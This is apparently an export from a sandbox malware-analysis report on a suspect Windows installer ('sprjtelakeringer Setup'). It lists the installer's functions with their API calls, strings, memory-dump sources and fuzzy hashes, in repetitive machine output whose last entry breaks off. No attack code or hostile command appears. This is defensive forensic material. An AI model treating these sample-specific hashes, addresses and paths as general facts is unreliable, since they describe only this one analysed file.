Associated: 00000000.00000002.3669729745.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_eAvqHiIsgR.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 5004c81fc86d5aad5056578f097f916dd0ceefac499e9113037a72ef071e40e2
Instruction ID: c67a8691079fc4563931701ff3f7f14ff0a893aaeadd9329411c5994133067d8
Opcode Fuzzy Hash: 5004c81fc86d5aad5056578f097f916dd0ceefac499e9113037a72ef071e40e2
Instruction Fuzzy Hash: 0CD05E73B10100DBD720EBB8BAC485F77B8EB503253308837E402E2091E579C8424628

Non-executed Functions

Function 0040535C Relevance: 54.3, APIs: 36, Instructions: 282windowclipboardmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000403), ref: 004053BB
GetDlgItem.USER32(?,000003EE), ref: 004053CA
GetClientRect.USER32(?,?), ref: 00405407
GetSystemMetrics.USER32(00000002), ref: 0040540E
SendMessageA.USER32(?,0000101B,00000000,?), ref: 0040542F
SendMessageA.USER32(?,00001036,00004000,00004000), ref: 00405440
SendMessageA.USER32(?,00001001,00000000,?), ref: 00405453
SendMessageA.USER32(?,00001026,00000000,?), ref: 00405461
SendMessageA.USER32(?,00001024,00000000,?), ref: 00405474
ShowWindow.USER32(00000000,?,0000001B,?), ref: 00405496
ShowWindow.USER32(?,00000008), ref: 004054AA
GetDlgItem.USER32(?,000003EC), ref: 004054CB
SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 004054DB
SendMessageA.USER32(00000000,00000409,00000000,?), ref: 004054F4
SendMessageA.USER32(00000000,00002001,00000000,?), ref: 00405500
GetDlgItem.USER32(?,000003F8), ref: 004053D9

Part of subcall function 004041B0: SendMessageA.USER32(00000028,?,00000001,00403FE0), ref: 004041BE

GetDlgItem.USER32(?,000003EC), ref: 0040551C
CreateThread.KERNEL32(00000000,00000000,Function_000052F0,00000000), ref: 0040552A
CloseHandle.KERNEL32(00000000), ref: 00405531
ShowWindow.USER32(00000000), ref: 00405554
ShowWindow.USER32(?,00000008), ref: 0040555B
ShowWindow.USER32(00000008), ref: 004055A1
SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004055D5
CreatePopupMenu.USER32 ref: 004055E6
AppendMenuA.USER32(00000000,00000000,00000001,00000000), ref: 004055FB
GetWindowRect.USER32(?,000000FF), ref: 0040561B
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405634
SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405670
OpenClipboard.USER32(00000000), ref: 00405680
EmptyClipboard.USER32 ref: 00405686
GlobalAlloc.KERNEL32(00000042,?), ref: 0040568F
GlobalLock.KERNEL32(00000000), ref: 00405699
SendMessageA.USER32(?,0000102D,00000000,?), ref: 004056AD
GlobalUnlock.KERNEL32(00000000), ref: 004056C6
SetClipboardData.USER32(00000001,00000000), ref: 004056D1
CloseClipboard.USER32 ref: 004056D7

Memory Dump Source

Source File: 00000000.00000002.3669603090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3669584208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669619351.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669729745.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_eAvqHiIsgR.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
String ID:
API String ID: 590372296-0
Opcode ID: e77ccb86652fbc0499d97b80cacae04005d5d9073b444bb924cd904a6cf5059e
Instruction ID: ad896caeff922a337f51dbee0e8d50556c939e1053927b0f1ec287220421205b
Opcode Fuzzy Hash: e77ccb86652fbc0499d97b80cacae04005d5d9073b444bb924cd904a6cf5059e
Instruction Fuzzy Hash: 3DA14A70900608BFDB119F61DD89EAE7FB9FB08354F50403AFA45BA1A0CB754E519F68

Function 0040460D Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 274stringCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003FB), ref: 0040465C
SetWindowTextA.USER32(00000000,?), ref: 00404686
SHBrowseForFolderA.SHELL32(?,00429C68,?), ref: 00404737
CoTaskMemFree.OLE32(00000000), ref: 00404742
lstrcmpiA.KERNEL32(Call,0042A890), ref: 00404774
lstrcatA.KERNEL32(?,Call), ref: 00404780
SetDlgItemTextA.USER32(?,000003FB,?), ref: 00404792

Part of subcall function 004057F7: GetDlgItemTextA.USER32(?,?,00000400,004047C9), ref: 0040580A

Part of subcall function 004063D2: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\eAvqHiIsgR.exe",75923410,C:\Users\user\AppData\Local\Temp\,00000000,00403323,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 0040642A
Part of subcall function 004063D2: CharNextA.USER32(?,?,?,00000000,?,00000007,00000009,0000000B), ref: 00406437
Part of subcall function 004063D2: CharNextA.USER32(?,"C:\Users\user\Desktop\eAvqHiIsgR.exe",75923410,C:\Users\user\AppData\Local\Temp\,00000000,00403323,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 0040643C
Part of subcall function 004063D2: CharPrevA.USER32(?,?,75923410,C:\Users\user\AppData\Local\Temp\,00000000,00403323,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 0040644C

GetDiskFreeSpaceA.KERNEL32(00429860,?,?,0000040F,?,00429860,00429860,?,00000001,00429860,?,?,000003FB,?), ref: 00404850
MulDiv.KERNEL32(?,0000040F,00000400), ref: 0040486B

Part of subcall function 004049C4: lstrlenA.KERNEL32(0042A890,0042A890,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004048DF,000000DF,00000000,00000400,?), ref: 00404A62
Part of subcall function 004049C4: wsprintfA.USER32 ref: 00404A6A
Part of subcall function 004049C4: SetDlgItemTextA.USER32(?,0042A890), ref: 00404A7D

Strings

#AT, xrefs: 004048C7
C:\Users\user\tranchet, xrefs: 0040475D
A, xrefs: 00404730
Call, xrefs: 0040476E, 00404773, 0040477E

Memory Dump Source

Source File: 00000000.00000002.3669603090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3669584208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669619351.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669729745.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_eAvqHiIsgR.jbxd

Similarity

API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
String ID: #AT$A$C:\Users\user\tranchet$Call
API String ID: 2624150263-3922936877
Opcode ID: 22496922587a79a87c82097af160ec6f00736279c4fa3eb8ac5991cd3654d7e0
Instruction ID: 02b07c61478aeb9ac600f99876a590f4236d4304051c708c1213a6c52027fc1c
Opcode Fuzzy Hash: 22496922587a79a87c82097af160ec6f00736279c4fa3eb8ac5991cd3654d7e0
Instruction Fuzzy Hash: CAA16FB1900209ABDB11EFA6DD45AAF77B8EF84314F14843BF601B62D1DB7C89418B69

Function 00406945 Relevance: .3, Instructions: 334COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3669603090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3669584208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669619351.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669729745.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_eAvqHiIsgR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1141b8caf72e3132df9e3aa140a50eda8930c9371ed3a7f86c2d2c6764d1ec0e
Instruction ID: f64ed9f862d89b69eb15ddc430260785fe10463149b241517d112065bf602f9e
Opcode Fuzzy Hash: 1141b8caf72e3132df9e3aa140a50eda8930c9371ed3a7f86c2d2c6764d1ec0e
Instruction Fuzzy Hash: 57E19BB190070ACFDB24CF59C880BAAB7F5EB45305F15892EE497A7291D378AA51CF14

Function 0040711C Relevance: .3, Instructions: 300COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3669603090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3669584208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669619351.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669729745.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_eAvqHiIsgR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 99f6c7e6b8620be82bccd3d2e3e98bb61de1be8b453b643f323292903d4af905
Instruction ID: 8f207273dfcdbc59f762b6c847d1a58b94b1624b669f9e87ec0d9a9138a8e2bc
Opcode Fuzzy Hash: 99f6c7e6b8620be82bccd3d2e3e98bb61de1be8b453b643f323292903d4af905
Instruction Fuzzy Hash: 0DC15A31E04259CBCF18CF68D4905EEBBB2BF98314F25826AD8567B380D734A942CF95

Function 00404B80 Relevance: 65.2, APIs: 33, Strings: 4, Instructions: 491windowmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003F9), ref: 00404B97
GetDlgItem.USER32(?,00000408), ref: 00404BA4
GlobalAlloc.KERNEL32(00000040,?), ref: 00404BF3
LoadImageA.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404C0A
SetWindowLongA.USER32(?,000000FC,00405192), ref: 00404C24
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404C36
ImageList_AddMasked.COMCTL32(00000000,00000110,00FF00FF), ref: 00404C4A
SendMessageA.USER32(?,00001109,00000002), ref: 00404C60
SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404C6C
SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 00404C7C
DeleteObject.GDI32(00000110), ref: 00404C81
SendMessageA.USER32(?,00000143,00000000,00000000), ref: 00404CAC
SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404CB8
SendMessageA.USER32(?,00001100,00000000,?), ref: 00404D52
SendMessageA.USER32(?,0000110A,00000003,00000110), ref: 00404D82

Part of subcall function 004041B0: SendMessageA.USER32(00000028,?,00000001,00403FE0), ref: 004041BE

SendMessageA.USER32(?,00001100,00000000,?), ref: 00404D96
GetWindowLongA.USER32(?,000000F0), ref: 00404DC4
SetWindowLongA.USER32(?,000000F0,00000000), ref: 00404DD2
ShowWindow.USER32(?,00000005), ref: 00404DE2
SendMessageA.USER32(?,00000419,00000000,?), ref: 00404EDD
SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404F42
SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404F57
SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404F7B
SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404F9B
ImageList_Destroy.COMCTL32(?), ref: 00404FB0
GlobalFree.KERNEL32(?), ref: 00404FC0
SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00405039
SendMessageA.USER32(?,00001102,?,?), ref: 004050E2
SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 004050F1
InvalidateRect.USER32(?,00000000,00000001), ref: 0040511B
ShowWindow.USER32(?,00000000), ref: 00405169
GetDlgItem.USER32(?,000003FE), ref: 00405174
ShowWindow.USER32(00000000), ref: 0040517B

Strings

#AT, xrefs: 00405121
M, xrefs: 00404D3A
, xrefs: 00405153
N, xrefs: 00404E1B

Memory Dump Source

Source File: 00000000.00000002.3669603090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3669584208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669619351.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669729745.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_eAvqHiIsgR.jbxd

Similarity

API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $#AT$M$N
API String ID: 2564846305-3650667177
Opcode ID: fdda06af448e6c65fc04a67e7919175d0af5b83356ee1959317fb13923aa2151
Instruction ID: 99b70255f3faedab1c4ad885451b662392dfc0d6b29454a89b749d4faaca394f
Opcode Fuzzy Hash: fdda06af448e6c65fc04a67e7919175d0af5b83356ee1959317fb13923aa2151
Instruction Fuzzy Hash: 5D027DB0A00209AFDB20DF94DD85AAE7BB5FB44354F50813AF610BA2E0D7798D52CF58

Function 00403CA7 Relevance: 48.3, APIs: 32, Instructions: 346windowstringCOMMON

Download Yara Rule

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403CE3
ShowWindow.USER32(?), ref: 00403D00
DestroyWindow.USER32 ref: 00403D14
SetWindowLongA.USER32(?,00000000,00000000), ref: 00403D30
GetDlgItem.USER32(?,?), ref: 00403D51
SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403D65
IsWindowEnabled.USER32(00000000), ref: 00403D6C
GetDlgItem.USER32(?,00000001), ref: 00403E1A
GetDlgItem.USER32(?,00000002), ref: 00403E24
SetClassLongA.USER32(?,000000F2,?), ref: 00403E3E
SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403E8F
GetDlgItem.USER32(?,00000003), ref: 00403F35
ShowWindow.USER32(00000000,?), ref: 00403F56
EnableWindow.USER32(?,?), ref: 00403F68
EnableWindow.USER32(?,?), ref: 00403F83
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403F99
EnableMenuItem.USER32(00000000), ref: 00403FA0
SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403FB8
SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403FCB
lstrlenA.KERNEL32(0042A890,?,0042A890,00000000), ref: 00403FF5
SetWindowTextA.USER32(?,0042A890), ref: 00404004
ShowWindow.USER32(?,0000000A), ref: 00404138

Memory Dump Source

Source File: 00000000.00000002.3669603090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3669584208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669619351.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669729745.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_eAvqHiIsgR.jbxd

Similarity

API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
String ID:
API String ID: 184305955-0
Opcode ID: f90a3406d0b8a8c4b834731162917c717653151454b1dbe7dd2907c4aa61ec43
Instruction ID: 5e2b37e592d4e435839d8b6e88a40281f914ef55e2ab9fcffeaa2cd4c4a1132c
Opcode Fuzzy Hash: f90a3406d0b8a8c4b834731162917c717653151454b1dbe7dd2907c4aa61ec43
Instruction Fuzzy Hash: 45C1D271600204AFDB21AF62ED88D2B3ABCEB95706F50053EF641B51F0CB799892DB1D

Function 004042E6 Relevance: 38.7, APIs: 19, Strings: 3, Instructions: 202windowstringCOMMON

Download Yara Rule

APIs

CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 00404371
GetDlgItem.USER32(00000000,000003E8), ref: 00404385
SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 004043A3
GetSysColor.USER32(?), ref: 004043B4
SendMessageA.USER32(00000000,00000443,00000000,?), ref: 004043C3
SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 004043D2
lstrlenA.KERNEL32(?), ref: 004043D5
SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 004043E4
SendMessageA.USER32(00000000,00000449,?,00000110), ref: 004043F9
GetDlgItem.USER32(?,0000040A), ref: 0040445B
SendMessageA.USER32(00000000), ref: 0040445E
GetDlgItem.USER32(?,000003E8), ref: 00404489
SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 004044C9
LoadCursorA.USER32(00000000,00007F02), ref: 004044D8
SetCursor.USER32(00000000), ref: 004044E1
LoadCursorA.USER32(00000000,00007F00), ref: 004044F7
SetCursor.USER32(00000000), ref: 004044FA
SendMessageA.USER32(00000111,00000001,00000000), ref: 00404526
SendMessageA.USER32(00000010,00000000,00000000), ref: 0040453A

Strings

#AT, xrefs: 00404306
N, xrefs: 00404477
Call, xrefs: 004044B4

Memory Dump Source

Source File: 00000000.00000002.3669603090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3669584208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669619351.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669729745.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_eAvqHiIsgR.jbxd

Similarity

API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
String ID: #AT$Call$N
API String ID: 3103080414-431552163
Opcode ID: 745d5685d33c6010513eb6a6e6710873411dad37f80b0c9191fb1ce11dc8c820
Instruction ID: 2ba0dcbd17e821031ba3c657239c4b48ae58aa12c0a6ed8defdb88479dfe25c9
Opcode Fuzzy Hash: 745d5685d33c6010513eb6a6e6710873411dad37f80b0c9191fb1ce11dc8c820
Instruction Fuzzy Hash: CC61C2B1A00209BFDF10AF61DD45F6A3B69EB94754F00803AFB04BA1D1C7B8A951CF98

Function 00401000 Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 125COMMON

Download Yara Rule

APIs

DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32(?,?), ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010CF
FillRect.USER32(00000000,?,00000000), ref: 004010E4
DeleteObject.GDI32(?), ref: 004010ED
CreateFontIndirectA.GDI32(?), ref: 00401105
SetBkMode.GDI32(00000000,00000001), ref: 00401126
SetTextColor.GDI32(00000000,000000FF), ref: 00401130
SelectObject.GDI32(00000000,?), ref: 00401140
DrawTextA.USER32(00000000,sprjtelakeringer Setup,000000FF,00000010,00000820), ref: 00401156
SelectObject.GDI32(00000000,00000000), ref: 00401160
DeleteObject.GDI32(?), ref: 00401165
EndPaint.USER32(?,?), ref: 0040116E

Strings

F, xrefs: 0040100C
sprjtelakeringer Setup, xrefs: 00401150

Memory Dump Source

Source File: 00000000.00000002.3669603090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3669584208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669619351.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669729745.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_eAvqHiIsgR.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F$sprjtelakeringer Setup
API String ID: 941294808-4242612553
Opcode ID: bb71a3ab4a4fa1f895d534f8b47170c1d9b9c824dc85430c64170ade6c4bb6c2
Instruction ID: fc049dc8deed713fddbaab3278265d12b48f61153473f3c5d5e2d7be2f7e1970
Opcode Fuzzy Hash: bb71a3ab4a4fa1f895d534f8b47170c1d9b9c824dc85430c64170ade6c4bb6c2
Instruction Fuzzy Hash: 33417D71400249AFCF058FA5DE459AFBFB9FF44314F00802AF591AA1A0CB74D955DFA4

Function 00405D66 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 129memorystringCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,00000000,00405EF7,?,?), ref: 00405D97
GetShortPathNameA.KERNEL32(?,0042C620,00000400), ref: 00405DA0

Part of subcall function 00405BF5: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E50,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C05
Part of subcall function 00405BF5: lstrlenA.KERNEL32(00000000,?,00000000,00405E50,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C37

GetShortPathNameA.KERNEL32(?,0042CA20,00000400), ref: 00405DBD
wsprintfA.USER32 ref: 00405DDB
GetFileSize.KERNEL32(00000000,00000000,0042CA20,C0000000,00000004,0042CA20,?,?,?,?,?), ref: 00405E16
GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405E25
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E5D
SetFilePointer.KERNEL32(0040A3D8,00000000,00000000,00000000,00000000,0042C220,00000000,-0000000A,0040A3D8,00000000,[Rename],00000000,00000000,00000000), ref: 00405EB3
GlobalFree.KERNEL32(00000000), ref: 00405EC4
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405ECB

Part of subcall function 00405C90: GetFileAttributesA.KERNELBASE(00000003,00402EE1,C:\Users\user\Desktop\eAvqHiIsgR.exe,80000000,00000003), ref: 00405C94
Part of subcall function 00405C90: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405CB6

Strings

%s=%s, xrefs: 00405DD1
[Rename], xrefs: 00405E45, 00405E57

Memory Dump Source

Source File: 00000000.00000002.3669603090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3669584208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669619351.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669729745.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_eAvqHiIsgR.jbxd

Similarity

API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
String ID: %s=%s$[Rename]
API String ID: 2171350718-1727408572
Opcode ID: bb326c4fff2569f995f741f5889aaa438d16cb529eb983989e6eb254c782141b
Instruction ID: 2ccb2bf8dd744840d543bbc1a34bde763c5e5f86f0f2c8118c993f85f4779e4e
Opcode Fuzzy Hash: bb326c4fff2569f995f741f5889aaa438d16cb529eb983989e6eb254c782141b
Instruction Fuzzy Hash: 39310531600B15ABC2206B659D48F6B3A5CDF45755F14043BB981F62C2DF7CE9028AFD

Function 004063D2 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON

Download Yara Rule

APIs

CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\eAvqHiIsgR.exe",75923410,C:\Users\user\AppData\Local\Temp\,00000000,00403323,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 0040642A
CharNextA.USER32(?,?,?,00000000,?,00000007,00000009,0000000B), ref: 00406437
CharNextA.USER32(?,"C:\Users\user\Desktop\eAvqHiIsgR.exe",75923410,C:\Users\user\AppData\Local\Temp\,00000000,00403323,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 0040643C
CharPrevA.USER32(?,?,75923410,C:\Users\user\AppData\Local\Temp\,00000000,00403323,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 0040644C

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 004063D3
"C:\Users\user\Desktop\eAvqHiIsgR.exe", xrefs: 0040640E
*?|<>/":, xrefs: 0040641A

Memory Dump Source

Source File: 00000000.00000002.3669603090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3669584208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669619351.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
